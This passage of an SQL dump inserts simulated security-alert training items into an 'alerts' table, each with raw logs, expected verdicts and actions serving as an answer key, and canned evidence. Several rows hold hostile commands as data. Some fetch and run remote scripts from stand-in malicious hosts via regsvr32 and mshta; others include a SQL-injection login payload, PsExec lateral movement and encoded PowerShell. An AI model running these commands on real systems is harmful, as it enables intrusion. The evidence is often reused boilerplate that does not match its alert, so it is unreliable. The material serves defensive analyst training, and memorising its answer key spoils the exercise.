source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(662, 'Malicious Email with Phishing URL Detected', 'critical', 'Proofpoint', 'An email containing a known phishing URL was received, potentially targeting user credentials.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"no-reply@securebank.com\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"url\":\"http://securebank-login.com\"}', '2026-01-11 10:11:51', '2026-02-16 18:02:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://securebank-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing URL attempting to steal banking credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@securebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain resembling legitimate bank.\"}}],\"expected_actions\":[\"block_url\",\"notify_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Phishing URL detected in email, posing a threat to user credentials.\"}', 'Advanced', 'SIEM', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email with Phishing URL Detected\",\"date\":\"2026-02-01T20:32:22.309Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(663, 'Lateral Movement via PSExec Detected', 'high', 'CrowdStrike', 'Suspicious PSExec activity detected, indicating potential lateral movement within the network.', 'Lateral Movement', 'T1569.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.1.15\",\"dst_ip\":\"10.0.1.20\",\"username\":\"svc_admin\",\"hostname\":\"SRV-APP01\",\"command_line\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\"}', '2026-01-10 21:33:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\10.0.1.20 -u svc_admin -p ******** -c cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage detected, commonly used for lateral movement by attackers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec usage from internal to internal IPs suggests lateral movement.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(664, 'SQL Injection Attempt on Public Web Application', 'high', 'IDS/IPS', 'A potential SQL injection attack was detected targeting the login page of a public web application.', 'Web Attack', 'T1505', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T17:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://webapp.local/login\"}', '2026-01-10 00:59:01', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web-based attacks.\"}}],\"expected_actions\":[\"block_ip\",\"monitor_application\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempt detected via suspicious payload on login page.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.311Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://webapp.local/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(665, 'Data Exfiltration Detected via Suspicious Network Connection', 'critical', 'Firewall', 'A large amount of data was transferred to an external IP, indicating potential data exfiltration.', 'Data Exfil', 'T1048', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.2.14\",\"dst_ip\":\"198.51.100.75\",\"username\":\"nmartin\",\"hostname\":\"FILE-SRV01\",\"data_volume\":\"1.5GB\"}', '2026-01-10 00:24:48', '2026-03-14 14:53:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for numerous data exfiltration incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in suspicious data transfer.\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data volume transferred to a known malicious IP suggests data exfiltration.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(666, 'False Positive: Legitimate Certutil Activity Misclassified as Malicious', 'medium', 'SIEM', 'Certutil was executed on a user machine, typically flagged for potential malware download, but verified as a legitimate use case.', 'Malware', 'T1218.010', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.18\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jane.smith\",\"hostname\":\"HR-WORKSTATION\",\"command_line\":\"certutil.exe -addstore MyCompanyCert\"}', '2026-01-10 06:39:03', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"certutil.exe -addstore MyCompanyCert\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"This use of certutil is legitimate as part of company policy.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.3.18\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Certutil activity verified as legitimate based on internal policy use case.\"}', 'Advanced', 'EDR', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.314Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T19:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.3.18\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"HR-WORKSTATION\\\",\\\"command_line\\\":\\\"certutil.exe -addstore MyCompanyCert\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(667, 'Suspicious Regsvr32 Execution Detected', 'high', 'EDR', 'Regsvr32 was executed with a suspicious scriptlet URL, typical of a fileless malware attack.', 'Malware', 'T1218.010', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T20:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.4.22\",\"dst_ip\":\"192.168.1.11\",\"username\":\"mroberts\",\"hostname\":\"DESKTOP-ROBERTS\",\"command_line\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\"}', '2026-01-10 11:54:15', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /u /i:http://malicious.site/script.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Regsvr32 with URL pointing to a known malicious site.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.4.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Regsvr32 execution with external scriptlet URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(668, 'False Positive: Legitimate Application Misidentified as Malware', 'medium', 'EDR', 'A legitimate application was flagged as suspicious due to anomalous behavior, but verified as a false positive.', 'Malware', 'T1204.002', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T21:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.5.25\",\"dst_ip\":\"192.168.1.12\",\"username\":\"kclark\",\"hostname\":\"FINANCE-PC\",\"command_line\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\"}', '2026-01-10 14:40:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LegitApp\\\\update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"The application is verified as legitimate and safe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The flagged application was verified as legitimate and safe, confirming a false positive.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(669, 'Unauthorized Access Attempt on Database Server', 'high', 'SIEM', 'A potentially unauthorized access attempt was detected on a critical database server from an internal IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T22:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.6.33\",\"dst_ip\":\"192.168.1.13\",\"username\":\"dba_admin\",\"hostname\":\"DB-SERVER\",\"failed_attempts\":15}', '2026-01-10 10:37:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.6.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address attempting unauthorized access.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"dba_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common target for unauthorized access attempts.\"}}],\"expected_actions\":[\"reset_credentials\",\"monitor_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts indicate potential unauthorized access.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.318Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T22:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"10.0.6.33\\\",\\\"dst_ip\\\":\\\"192.168.1.13\\\",\\\"username\\\":\\\"dba_admin\\\",\\\"hostname\\\":\\\"DB-SERVER\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(670, 'False Positive: Misinterpreted Network Activity as Data Exfiltration', 'medium', 'Firewall', 'Network activity flagged as potential data exfiltration was verified to be a legitimate backup process.', 'Data Exfil', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T23:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.7.44\",\"dst_ip\":\"192.168.1.14\",\"username\":\"backup.svc\",\"hostname\":\"BACKUP-SERVER\",\"data_volume\":\"2.0GB\"}', '2026-01-10 09:03:09', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.7.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address engaged in backup process.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup.svc\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Service account used for legitimate backup operations.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Network activity verified as legitimate backup process, confirming a false positive.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(671, 'Suspicious Mshta Execution with Malicious Script', 'critical', 'EDR', 'Mshta was executed with a malicious remote script, indicating a potential fileless malware attack.', 'Malware', 'T1218.005', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T23:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.8.55\",\"dst_ip\":\"192.168.1.15\",\"username\":\"tjohnson\",\"hostname\":\"WORKSTATION-TJ\",\"command_line\":\"mshta http://malicious-site.com/malicious-script.hta\"}', '2026-01-10 20:15:05', '2026-02-16 18:03:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta http://malicious-site.com/malicious-script.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Execution of a remote HTA script, typical of fileless malware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.8.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Mshta execution with external script URL suggests fileless malware activity.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
